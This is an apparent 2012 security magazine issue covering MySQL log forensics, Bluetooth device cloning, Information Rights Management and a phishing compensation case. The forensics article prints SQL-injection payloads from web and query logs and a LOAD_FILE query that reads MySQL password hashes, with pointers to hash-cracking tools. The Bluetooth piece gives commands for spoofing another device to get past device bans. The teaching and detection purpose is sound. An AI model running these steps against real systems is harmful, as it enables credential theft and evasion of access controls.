Issue34 – Nov2012 | Page-1
Logging in MySQL

Introduction
This article demonstrates logging techniques in MySQL that help uncover and analyze mischief by users, whether outsiders or insiders, with a focus on specific areas of the database.

What you will learn
How logging is done in MySQL, and where to look for information about the queries executed by all clients of a MySQL database.

Pre-requisites
The reader must have basic working knowledge of MySQL and of the operating system to follow the technical details in this article.

Getting Started
Following are the types of logs available in MySQL:

Log Type          | Info Written to Log
Error log         | Problems encountered starting, running, or stopping mysqld
General query log | Established client connections and statements received from clients
Binary log        | Statements that change data (also used for replication)
Relay log         | Data changes received from a replication master server
Slow query log    | Queries that took more than long_query_time seconds to execute
By default the general query log and the slow query log are not enabled in MySQL. Before enabling anything, you can see what clients are running at this moment with show processlist (this does not enable logging; it only lists the threads currently connected):

mysql> show processlist;

Figure 1: processlist Output

Note: This shows all running threads; the Info column shows the statement each thread is executing. Without the PROCESS privilege you only see your own threads.
This only shows what is executing right now. If you want to see all the queries executed on the server, you have to log them first. We have seen the different types of logging in MySQL, so which one should we use? We will use the general query log, which records every statement sent to the server by every client. Keep in mind that it grows quickly on a busy server and that the statements it records may themselves contain sensitive data, so enable it deliberately and protect the log file.
How to go about it?
1. Check whether logging is enabled.
2. Check what type of logging is enabled (FILE, TABLE, BOTH).
3. If it is not enabled, enable it.
4. Know what to check.

Checking whether logging is enabled
Simply log into the MySQL prompt and issue the following command:

mysql> show variables;

This lists all the global variables in MySQL (a LIKE pattern such as 'general_log%' narrows the list). Look for the general_log variable and its value; if logging is not enabled its value will be OFF, and general_log_file will hold the path the log would be written to (the default is <hostname>.log under the data directory). On the setups used here:
For *NIX: "/var/lib/mysql/mysql.log"
For Windows (XAMPP setup): "C:\xampp\mysql\data\<system_name>.log"

Figure 2: All available variables in MySQL

What type of logging is enabled (FILE, TABLE, BOTH)?
You can determine the type of logging by looking at the value of the following variable:

log_output = 'FILE|TABLE|BOTH'

You can change its value with the following command:

mysql> SET GLOBAL log_output = 'FILE';
If logging is not enabled, how to enable it?
As logging is not enabled, let's enable it first. To do that, issue the following commands:

mysql> SET GLOBAL general_log = 'ON';
mysql> SET GLOBAL general_log_file = 'path_on_your_system';

Similarly you can turn on the slow query log:

mysql> SET GLOBAL slow_query_log = 'ON';
mysql> SET GLOBAL slow_query_log_file = 'path_on_your_system';

The slow query log records statements that took longer than the value of long_query_time to execute. Note that SET GLOBAL takes effect immediately but does not survive a server restart; put the same settings in my.cnf / my.ini to make them permanent, and make sure the mysqld process can write to the chosen path.

What to check?
So, we have all the required logs. What next? Let's analyze. What could be wrong?
- An attack from the web, the most common being SQL injection.
- Somebody on the inside: privilege escalation or data theft.
In both cases, who did it? Let's find out.

Case 1: Suppose somebody found a weak link in the application and got into the system through SQL injection. I don't have to explain what SQL injection is, but I can show what someone can do with it. For the attacker there is only one entry point, but in the backend there are many components: web server, database server, and so on. Let's look at the web server log first (in our case the Apache access log). During normal operations things look simple and straightforward; at a glance the log looks neat and clean.
Figure 3: Apache access log using Xpolog
Let's search for something like "select" to see whether anyone is trying to run a SQL query.

Figure 4: Filtering log on "select" command

Similarly we can search for "union" or any other SQL keyword to see whether any suspicious activity is going on.
Figure 5: Filtering log on "union" command
It is interesting to see that some requests carry SQL queries in their request parameters. Several of them share the same timestamp, to the second, which a human typing in a browser does not produce; it means the attacker ran an automated scanner against the vulnerable parameter. (The hex literal 0x7233646D3076335F68766A5F696E6A656374696F6E in the first request decodes to the string r3dm0v3_hvj_injection, a marker injected by the Havij scanner.) Suspicious log snippet:

127.0.0.1 - - [14/Sep/2012:15:45:10 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 54 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:45:10 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28version%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 39 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28system_user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28%40%40hostname+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 42 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
127.0.0.1 - - [14/Sep/2012:15:46:05 +0530] "GET /sqli.php?u=999999.9%27+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28%40%40basedir+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536+and+%27x%27%3D%27x HTTP/1.1" 200 47 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"

Reading the decoded payloads, the scanner is enumerating database(), user(), version(), system_user(), @@hostname and @@basedir one request at a time, and every response came back 200 with a small but varying body size, which is what a successful UNION-based extraction looks like from the web server side.
Once you are sure there is an incident of SQL injection from an unknown IP, you can proceed with the formal procedure of investigating the issue with the cyber cell.

Case 2: Now let's consider the second case, where a MySQL user who has access to the database has done some mischief. Popular activities are:
- Running privilege escalation attacks
- Getting the root password (we will see how)
- Dumping database(s) into files
Note: A few privilege escalation attacks are also available in Metasploit. Getting the root password hash is fairly simple. A user just has to execute the following command at the prompt (use forward slashes or doubled backslashes, since a single backslash is an escape character inside a MySQL string literal):

mysql> SELECT LOAD_FILE('C:/xampp/mysql/data/mysql/user.MYD');

Note: The path will change as per the setup. LOAD_FILE() only works for an account holding the FILE privilege, and the file has to be readable by the mysqld process (and, where secure_file_priv is set, located under that directory); otherwise the function quietly returns NULL. So a truly low-privileged account cannot do this, but accounts are often granted more than they need. If you are not getting any result, the alternative is direct access to the file through SSH, RDP, etc. Basically we just need the data in this file. user.MYD is the MyISAM data file of the mysql.user table; it holds the MySQL account information, including user names and password hashes. If you are the root user you can simply run the following query to see all users:

mysql> select Host, User, Password from mysql.user;
Figure 6: Users table in MySQL
When a low-privileged user (fdb in our case) tries to run this query, he will obviously get an access denied error. At this point the previous query, reading the file directly, comes in handy (provided his account has the FILE privilege). So, what is the problem now? Simple: the Password column does not hold the password but a hash. Since MySQL 4.1 it is a double SHA-1 of the password, displayed as 41 characters beginning with '*' (a 16-character value is the old pre-4.1 format); it is not MD5, as is often assumed. Cracking a weak password from it does not take long. Note: tools like John the Ripper and Cain & Abel support these MySQL hash formats.

Considering the last item, where the user dumps the database into a file for some notorious purpose, we can check the general_log or slow_query_log for such queries. In this case we open the log file in a text editor and do some manual analysis first. Here is a snippet of the query log:

325 Connect   root@localhost on
325 Init DB   forensics
325 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 3,1),0x31303235343830303536 and 'x'='x'
325 Quit
326 Connect   root@localhost on
326 Init DB   forensics
326 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 4,1),0x31303235343830303536 and 'x'='x'
326 Quit
327 Connect   root@localhost on
327 Init DB   forensics
327 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 5,1),0x31303235343830303536 and 'x'='x'
327 Quit
328 Connect   root@localhost on
328 Init DB   forensics
328 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 6,1),0x31303235343830303536 and 'x'='x'
328 Quit
329 Connect   root@localhost on
329 Init DB   forensics
329 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 7,1),0x31303235343830303536 and 'x'='x'
329 Quit
330 Connect   root@localhost on
330 Init DB   forensics
330 Query     SELECT * FROM forensics_test where uname = '999999.9' union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 8,1),0x31303235343830303536 and 'x'='x'
330 Quit

The scanner is walking information_schema.schemata one row at a time (limit 3,1 ... limit 8,1) to list every database name. Note also that every one of these connections is root@localhost: the web application talks to MySQL as root, so each injected query runs with full privileges. That is a finding in itself; the application should connect with an account limited to the tables it needs.
What we basically search for are statements like "union select", queries against the information_schema database, queries against the mysql database, and the LOAD_FILE() and INTO OUTFILE constructs used to read and dump files. Then analyze further to reach a conclusion.
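The search described above, done in code. This is an added example and not part of the original article: a Python script that parses Apache access-log lines and MySQL general-log lines, URL-decodes the request parameters, translates hex literals such as 0x7e back into text, flags the indicators named in the text ("union select", information_schema, mysql.*, LOAD_FILE, INTO OUTFILE), attributes each flagged query to the account that opened its connection, and groups probes that arrive within the same second. The log lines in the block are constructed for this example; the parameter name u, the path /sqli.php and the account names are assumptions.

```python
"""Added example (not part of the original article): scan Apache access-log
lines and MySQL general-log lines for SQL-injection probes.  Sample lines are
constructed for this example; only the payload shape follows the capture in
the article, and the parameter name, paths and accounts are assumptions."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache combined log: ip ident user [timestamp] "method target protocol" status size ...
APACHE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+')

# MySQL general log (file form): optional "YYMMDD HH:MM:SS", thread id, command, argument.
GENERAL_RE = re.compile(
    r'^\s*(?:\d{6}\s+\d{1,2}:\d{2}:\d{2}\s+)?(?P<thread>\d+)\s+'
    r'(?P<cmd>Connect|Init DB|Query|Quit)\s*(?P<arg>.*)$')

# The article's search terms, plus the file read/write constructs from Case 2.
INDICATORS = [
    ("union select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("mysql system tables", re.compile(r"\bmysql\s*\.\s*\w+", re.I)),
    ("load_file", re.compile(r"\bload_file\s*\(", re.I)),
    ("into outfile", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("tautology", re.compile(r"'(\w+)'\s*=\s*'\1")),
]
HEX_LITERAL = re.compile(r"\b0x([0-9a-fA-F]+)\b")


def decode_hex_literals(sql):
    """Show MySQL hex literals as <text> when they decode to printable ASCII;
    scanners use them to smuggle markers and names past keyword filters."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        raw = bytes.fromhex(digits)
        if raw and all(0x20 <= b < 0x7F for b in raw):
            return "<" + raw.decode("ascii") + ">"
        return m.group(0)
    return HEX_LITERAL.sub(repl, sql)


def sqli_indicators(text):
    """Names of every indicator that fires on an already-decoded statement."""
    return [name for name, pat in INDICATORS if pat.search(text)]


def scan_apache(lines):
    """URL-decode each query parameter of each request; keep those with indicators."""
    hits = []
    for line in lines:
        m = APACHE_RE.match(line)
        if not m:
            continue
        for key, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            decoded = decode_hex_literals(value)
            found = sqli_indicators(decoded)
            if found:
                hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                             "param": key, "indicators": found, "decoded": decoded})
    return hits


def scan_general_log(text):
    """Flag queries and attribute each one to the account that opened its thread."""
    owner, hits = {}, []
    for line in text.splitlines():
        m = GENERAL_RE.match(line)
        if not m:
            continue
        if m["cmd"] == "Connect" and m["arg"].split():
            owner[m["thread"]] = m["arg"].split()[0]          # e.g. root@localhost
        elif m["cmd"] == "Query":
            decoded = decode_hex_literals(m["arg"])
            found = sqli_indicators(decoded)
            if found:
                hits.append({"thread": m["thread"], "user": owner.get(m["thread"], "?"),
                             "indicators": found, "decoded": decoded})
    return hits


def bursts(hits, threshold=2):
    """(ip, timestamp) pairs with `threshold` or more probes in the same second:
    the footprint of an automated scanner rather than a person at a keyboard."""
    counts = Counter((h["ip"], h["ts"]) for h in hits)
    return {key: n for key, n in counts.items() if n >= threshold}


def _req(ts, payload, size):
    """Constructed combined-log line for a request to the assumed /sqli.php?u= endpoint."""
    return (f'127.0.0.1 - - [14/Sep/2012:{ts} +0530] "GET /sqli.php?u={payload} HTTP/1.1" '
            f'200 {size} "-" "Mozilla/4.0"')


# Constructed sample: one benign request, then probes shaped like the article's.
APACHE_LINES = [
    _req("15:44:58", "42", 54),
    _req("15:45:10", "999999.9%27+union+all+select+concat%280x7e%2C"
         "0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x7e%29+and+%27x%27%3D%27x", 54),
    _req("15:46:05", "999999.9%27+union+all+select+concat%280x7e%2Cunhex%28Hex%28cast%28"
         "database%28%29+as+char%29%29%29%2C0x7e%29+and+%27x%27%3D%27x", 42),
    _req("15:46:05", "999999.9%27+union+all+select+concat%280x7e%2Cunhex%28Hex%28cast%28"
         "user%28%29+as+char%29%29%29%2C0x7e%29+and+%27x%27%3D%27x", 47),
]
GENERAL_LOG = (  # constructed general-log excerpt; thread 325 is the attack, 326 is benign
    "120914 15:45:10\t  325 Connect\troot@localhost on forensics\n"
    "\t\t  325 Init DB\tforensics\n"
    "\t\t  325 Query\tSELECT * FROM forensics_test where uname = '999999.9' union all select "
    "(select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) "
    "from `information_schema`.schemata limit 3,1),0x31303235343830303536 and 'x'='x'\n"
    "\t\t  325 Quit\t\n"
    "\t\t  326 Connect\tapp@localhost on forensics\n"
    "\t\t  326 Query\tSELECT * FROM forensics_test where uname = 'alice'\n"
    "\t\t  326 Quit\t\n")

if __name__ == "__main__":
    web_hits = scan_apache(APACHE_LINES)
    for hit in web_hits:
        print(hit["ts"], hit["param"], hit["indicators"], hit["decoded"])
    print("bursts:", bursts(web_hits))
    for hit in scan_general_log(GENERAL_LOG):
        print(hit["thread"], hit["user"], hit["indicators"])
```

Run it against a real access log by replacing APACHE_LINES with the file's lines; the regular expressions assume the combined log format and the default file form of the general log (log_output = 'FILE'). The bursts() threshold is a starting point: tune it against normal traffic before treating a match as an incident, and remember that a clean keyword search will miss payloads that avoid the words you search for, so the decoded text is what you should read.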
Conclusion
Logging alone will not do the job; it is equally important to analyze what was logged. Frequently, database administrators enable the logging features and leave it at that, but the analysis behind it is far more important. One thing I probably shouldn't mention is that, using this technique, you can extract all the queries issued by an automated scanner like Havij or SQLMap. I do not recommend abusing that, but once you know the queries these tools run you will understand SQL injection better.
Dhiraj Ranka
dhiraj.ranka@niiconsulting.com
Dhiraj Ranka has been working as a Senior Security Analyst at NII Consulting, Mumbai, for more than four years. He is additionally involved in intensive research and web application testing, primarily for executing vulnerability assessment projects and delivering trainings.
Cloning Bluetooth Device

[Note: This demonstration is based on the article "Bluetooth Reconnaissance – Watching over Invisible". Please go through it before moving forward.]

In the previous section we saw how to find devices that are in visible as well as in invisible mode using different tools, and understood the different terms we get from the scanning process. Here we will recall one scan result: the first block gives the Bluetooth address (BD_ADDR), then the clock offset, and then the class information. By looking at the class information we can conclude what kind of device we have scanned.

In this section let's play with our own Bluetooth interfaces, so that we can prepare them for attack.

Initial State:
[Screenshot: initial configuration of the hci1 external Bluetooth dongle. Look especially at the BD_ADDR, Name and Class fields.]

Basic and most important, first we will change the BD_ADDR of the device:
#bdaddr -i hci1 <new_bd_addr>
As with hci1, we can change the address of any of our Bluetooth devices as we want.

You can cross-check the configuration with: #hciconfig -a

In the above screenshot you can see that the BD_ADDR of both the hci0 and hci1 devices has changed:
hci0 to AA:AA:AA:AA:AA:AA
hci1 to BB:BB:BB:BB:BB:BB

Now, rather than changing the address to all A's or all B's, we can clone any other Bluetooth device. First scan the air: #hcitool scan

Why not pick up the Android phone's BD_ADDR? #bdaddr -i hci1 <BD_ADDR>

So now we have successfully changed the BD_ADDR. Interesting note: on supported chipsets bdaddr writes the new address into the dongle's persistent storage, so it stays until you change it again, even across reboots (bdaddr's -t option makes the change transient instead, and -r resets the device so the new address takes effect). Keep in mind that two devices with the same BD_ADDR in range of each other will confuse pairing and connections, so keep the original out of range while testing. Now let's change our device name: #hciconfig hci1 name "android"

You can cross-check again and verify that the name is also changed.
So now, will our Bluetooth device act as a phone? The answer is no. Look at the class field: it is still 0x000000. Let's change its class and services too:

#hciconfig hci1 class 0x58020c

With these settings, when a scan is made from a smartphone, two of our devices show up: bt0, the default Bluetooth interface that we have not changed, and "android", which is nothing but the hci1 dongle we have turned into an Android smartphone. The value 0x58020c decodes to major class Phone, minor class Smartphone, with the Telephony, Object Transfer and Capturing service bits set. Now we have changed the BD_ADDR, the name and also the class of our device as we wished.

The question is: why make these changes? Basically, if a particular type of Bluetooth device is blocked or not allowed on certain premises, we can simply turn ourselves into any other device with just a few commands. The above settings also play a very important role in many of the attacks we will look at further on.
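The class value is easier to choose, and to verify after hciconfig -a, when you can read it bit by bit. The following is an added example, not from the article or from BlueZ: a Python decoder/encoder for the 24-bit Class of Device field following the Bluetooth Baseband assigned-numbers layout (format type in bits 0-1, minor class in bits 2-7, major class in bits 8-12, service flags in bits 13-23), with the Phone and Computer minor-class tables filled in. The hciconfig output it parses is a constructed excerpt rather than a real capture, and the device name in it is an assumption.

```python
"""Added example (not from the article or BlueZ): decode and build Bluetooth
Class of Device (CoD) values such as the 0x58020c set with hciconfig above.
Bit layout per the Bluetooth Baseband assigned numbers; only the Computer and
Phone minor-class tables are spelled out here."""
import re

# bits 13-23: service class flags (bits 14 and 15 are reserved)
SERVICE_BITS = {13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
                18: "Rendering", 19: "Capturing", 20: "Object Transfer",
                21: "Audio", 22: "Telephony", 23: "Information"}
# bits 8-12: major device class
MAJOR_CLASSES = {0: "Miscellaneous", 1: "Computer", 2: "Phone",
                 3: "LAN/Network Access Point", 4: "Audio/Video", 5: "Peripheral",
                 6: "Imaging", 7: "Wearable", 8: "Toy", 9: "Health", 31: "Uncategorized"}
# bits 2-7: minor device class; its meaning depends on the major class
MINOR_CLASSES = {
    1: {0: "Uncategorized", 1: "Desktop workstation", 2: "Server-class computer",
        3: "Laptop", 4: "Handheld PC/PDA", 5: "Palm-size PC/PDA",
        6: "Wearable computer", 7: "Tablet"},
    2: {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smartphone",
        4: "Wired modem or voice gateway", 5: "Common ISDN access"},
}


def decode_cod(cod):
    """Split a 24-bit CoD into major class, minor class and the service flags set."""
    if cod < 0 or cod > 0xFFFFFF or cod & 0x3:
        raise ValueError("CoD must be 24 bits with format-type bits 0-1 clear")
    major = (cod >> 8) & 0x1F
    minor = (cod >> 2) & 0x3F
    return {
        "major": MAJOR_CLASSES.get(major, f"reserved major {major}"),
        "minor": MINOR_CLASSES.get(major, {}).get(minor, f"minor {minor}"),
        "services": [name for bit, name in SERVICE_BITS.items() if cod >> bit & 1],
    }


def encode_cod(major, minor, services=()):
    """Build the CoD for a major/minor class name plus service names: the number
    to hand to `hciconfig hciX class` to look like the chosen device."""
    major_code = next(k for k, v in MAJOR_CLASSES.items() if v == major)
    minor_code = next(k for k, v in MINOR_CLASSES.get(major_code, {}).items() if v == minor)
    cod = (major_code << 8) | (minor_code << 2)
    for name in services:
        cod |= 1 << next(bit for bit, v in SERVICE_BITS.items() if v == name)
    return cod


def class_from_hciconfig(output):
    """Pull the Class: field out of `hciconfig -a` output; None if absent."""
    m = re.search(r"Class:\s*0x([0-9a-fA-F]{6})", output)
    return int(m.group(1), 16) if m else None


# Constructed excerpt in the shape of `hciconfig -a` output (not a real capture).
SAMPLE_HCICONFIG = """\
hci1:\tType: BR/EDR  Bus: USB
\tBD Address: BB:BB:BB:BB:BB:BB  ACL MTU: 310:10  SCO MTU: 64:8
\tUP RUNNING PSCAN ISCAN
\tName: 'android'
\tClass: 0x58020c
"""

if __name__ == "__main__":
    cod = class_from_hciconfig(SAMPLE_HCICONFIG)
    print(hex(cod), decode_cod(cod))
    laptop = encode_cod("Computer", "Laptop", ["Networking", "Object Transfer"])
    print("laptop CoD for hciconfig:", hex(laptop), decode_cod(laptop))
```

encode_cod() gives you the value to pass to hciconfig for a device type of your choosing, and decode_cod() run on a scan result tells you what a target is advertising before you copy it.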
Again the question is: while making these configuration changes, how do we find which class to move to? A class-of-device generator is available at URL: http://bluetoothpentest.narod.ru/software/bluetooth_class_of_device-service_generator.html, where you can find the class of any device you want to pick up.
Swaroop D. Yermalkar
swaroop.wireless@gmail.com
Swaroop is a final year engineering student at M.I.T. College of Engineering, Pune. He is an infosec enthusiast and hobbyist.
As per your need, you can pick any type of device with the services you want, as shown above.
Information Rights Management (IRM)
Information Rights Management is the set of techniques and methods that protect the highly sensitive information of an organization irrespective of the file's location, whether it resides inside or outside the corporate boundary. This works because the permissions embedded inside the file do not allow unauthorized access, modification, copying or printing. It is typically used to protect financial documents, intellectual property such as patents and design blueprints, and executive communications. Broadly speaking, IRM addresses a fundamental gap in Data Leakage Prevention (DLP). DLP relies heavily on protecting sensitive files within the corporate network, typically at its end points. It protects data based on its location (directory, file server, database) or while in transit, but does not protect at a more granular level, i.e. the information contained in the file itself. IRM currently applies mainly to documents and e-mails in a typical corporate environment. While DLP is a "transmission control" technology, IRM is a "usage control" technology.
Why do we need IRM?
The rationale for using IRM is that the privacy information associated with data must travel along with it. Copying the data must not strip the rights associated with it. The rights to modify, update, restrict or even destroy that information must be retained by the individual it pertains to, even when a third party holds the information. In a larger context, IRM helps organizations enforce the corporate policy governing the secure flow of highly sensitive data. File protections are defined and enforced based on the user's identity together with the corporate policy for the given class of data. The best way to protect information is to do it directly at the level of the information, and not at the level of the many systems that might change, transport or store it.
What exactly can be achieved with IRM?
- Preventing restricted content from unauthorized modification, copying, printing or pasting
- Disabling the Print Screen feature in Microsoft Windows for taking snapshots of restricted content
- Restricting content exposure wherever it is sent
- Supporting file expiration, so that document contents are automatically rendered un-viewable (or viewable) after a set time
- Full auditing of both access to documents and changes to the rights/policy by business users
What can't be prevented using IRM?
- Sensitive content from being erased, stolen, captured or transmitted by malicious programs like Trojans, key loggers etc.
- Content from being lost or corrupted due to virus infection
- Restricted content from being hand-copied or retyped from a display screen
- An unauthorized person taking a digital photograph of the restricted content displayed on a screen
- Snapshots of restricted content taken with third-party screen-capture tools
Are Digital Rights Management (DRM) and IRM the same thing?
Not really. Digital Rights Management (DRM) technologies are typically used by hardware manufacturers, publishers, copyright holders and individuals with the intent to limit the use of digital content and devices "after sale". It is specifically targeted at defeating attempts at rich media piracy: Blu-ray, CDs, DVDs, tapes and records. In the United States a legal mandate, the Digital Millennium Copyright Act (DMCA), imposes criminal penalties on those who make available technologies whose primary purpose is to bypass content protection. The main focus of DRM is to defeat copyright infringement by putting "digital locks" on rich media (records, CDs, DVDs etc.) in the business-to-customer domain, while IRM restricts itself to sensitive information exchange in the business-to-business domain, such as merger and acquisition plans, design blueprints, patents, financial statements, strategic business plans etc.

Key for IRM's successful implementation
The strength of IRM is typically reserved for very sensitive information that travels outside the organization, to vendors, suppliers, outsourced parties, partners etc. But the challenges of proper authentication are quite complex outside the enterprise. Here, three approaches must be used for an effective implementation of enterprise IRM solutions:

Automating policy assignment
The more automated policy assignment is, the better the IRM implementation. Automation eliminates the human errors inherent in manual processes, which in turn makes it more effective. Policies can automatically protect documents such as price lists, product specifications, and manufacturing process descriptions. This works well because if we let document authors be the sole arbiters of what to protect, it puts an unwelcome burden on them. They may neglect to do it correctly, consistently, or at all. Organizations can automatically assign policies to entire information groups, such as anything saved to a certain folder, content of a certain type, or information that has reached a particular stage in a workflow. This saves time, ensures consistency, and is the most efficient way to manage large volumes of sensitive information with IRM.
Dynamic policy control
As business conditions evolve, the IRM policies that govern the use of content must evolve as well. Events such as patent expirations, litigation settlements, and mergers and acquisitions, as well as regulatory changes, almost always require modifications to information policies. Dynamic policy control lets recipient entitlements be changed when individual roles or business needs change, regardless of where the content resides, even when its location is unknown. Policies reside on a policy server, not within the content, so they can be changed or revoked at any time. Rights can also be set to expire automatically.

Discretionary policy application
In the enterprise, discretionary use of IRM is an option that should be used in addition to, rather than instead of, automated policy application.
Audit Trail An audit trail is an unalterable, chronological log of access to a system and a record of additions, changes, and deletions to information that system manages, which lists the person accessing the system, and the time of access, and the action taken.
Steps before Implementing IRM
So you are all rolled up to implement an IRM solution in your company. Before that, answer this quick checklist:
- Which business areas frequently exchange sensitive information?
- What needs to be protected (documents, e-mail etc.)?
- How will security policies be enforced to protect this sensitive information or communication?
- Who can use the information (people, groups)?
- What can a user do with that information (read, write, print or forward)?
- When can the user access the information (time duration and dates)?
- Where can the information be accessed from (in the office, at home)?
- What would be the consequences to the business if this information ended up in the wrong hands?
- Does the organization retain any employee, customer, or member information that could be used for identity theft if it were exposed through loss or theft?

Popular IRM Vendor List
- Seclore File Secure
- Microsoft Integrated Rights Management
- Boole Server
- Smart Cipher
- EMC IRM Product Suite
Challenges in IRM implementation
Lack of commitment by senior management
The biggest roadblock to a successful IRM implementation is inadequate commitment from senior management. Management has to be convinced of, and made aware of, the value of information to the business. The consequences of losing sensitive information must be highlighted: loss of brand image and reputation, loss of client and stakeholder confidence, and unpleasant lawsuits if the leakage of sensitive information becomes public.

A common mistake made by senior managers during implementation is to delegate the whole of the IRM implementation to the IT team and not take much responsibility for it. IRM must be driven from the top by senior management, which alone can bring about a cultural change in the organization. Without their support, the implementation at best stays patchy and disorganized.

User unwillingness to change
IRM's restrictive nature and perceived usage hassles may at first not go down well with users. Users must undergo mandatory training and awareness workshops to ease this process. The suggested methodology for managers to induce change in users can be summarized as:
- Unfreezing: this step alters the forces on individuals sufficiently that they become open to a change. It reduces user resistance through increased peer pressure to go along with the change.
- Moving: this step presents the direction of the change and the actual practice of learning new attitudes.
- Refreezing: the final step fixes the changed attitudes and learned skills in users.

A good practice is to train some people in the organization and nurture them as champions in the usage of IRM. It is better if at least one person from every department is included in the IRM implementation task force. This task force works in close cooperation with the vendors/security team during the implementation process. After the official implementation is over, these champions provide the first point of reference and support for any IRM issues that new users run into. Hence user satisfaction increases, and consequently resistance to adopting the new technology is lowered.
Miscellaneous Factors
External user authentication for partners, vendors, suppliers and outsourced parties must be strong and well formed. Any loose ends will damage the confidentiality of the information.

Most IRM products, like Microsoft's Windows Rights Management Services, are great for Windows and Office, but they are mainly for Microsoft applications. For applications such as CAD or blueprints, the other solutions are either from small vendors or very limited in scope.
Manas Deep
Manas.deep@niiconsulting.com
Manas Deep currently serves as a Security Analyst in the Technical Assessment team at NII Consulting, Mumbai. His work focuses on conducting security audits, vulnerability assessments and penetration tests for NII's premier clients. He possesses strong analytical skills and likes to keep himself involved in learning new attack vectors, tools and technologies. He has a flair for technical writing and shares his thoughts on his blog "Experiencing Computing…" at http://manasdeeps.blogspot.in. He has also published information security paper(s) in the International Journal of Computer Science and Information Security (IJCSIS) as well as in various seminar and conference proceedings.
Landmark Cases Decided by the Adjudication Office under Chapter IX of the IT Act

(I) Shri Thomas Raju Vs. The Branch Manager, ICICI Bank, Anna Nagar Branch, Chennai
Case decided by: the Adjudicating Officer, Government of Tamil Nadu, Civil Jurisdiction. Petition No. 3 of 2011, dated 16th May, 2011.
The Petitioner, an employee of a Chennai-based IT company, suffered a loss of Rs. 1,62,800/- as a result of a phishing attack. The said amount was allegedly transferred to the account of another customer of ICICI Bank. The Petitioner claimed that he had suffered a wrongful loss due to unauthorised access to his savings account at the Anna Nagar branch of ICICI Bank.

